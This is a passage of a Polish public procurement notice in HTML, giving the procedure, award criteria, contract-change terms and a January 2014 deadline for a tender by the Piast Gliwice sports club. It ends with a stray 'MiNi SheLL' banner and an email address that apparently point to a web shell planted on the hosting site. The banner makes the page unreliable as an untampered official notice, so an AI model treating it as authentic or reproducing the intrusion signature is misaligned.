<p>a)	Osobę/osoby upoważnione do reprezentacji Wykonawcy/Wykonawców w obrocie prawnym zgodnie z danymi ujawnionymi w KRS - rejestrze przedsiębiorców albo w ewidencji działalności gospodarczej lub Pełnomocnika.
b)	W przypadku Wykonawców wspólnie ubiegających się o zamówienie ofertę podpisuje osoba umocowana do tej czynności prawnej, co powinno wynikać z dokumentów  (pełnomocnictw) załączonych do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany obowiązującej stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.piast-gliwice.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gliwicki Klub Sportowy PIAST SA, 44-100 Gliwice, ul. Okrzei 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2014 godzina 13:00, miejsce: Gliwicki Klub Sportowy PIAST SA, 44-100 Gliwice, ul. Okrzei 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com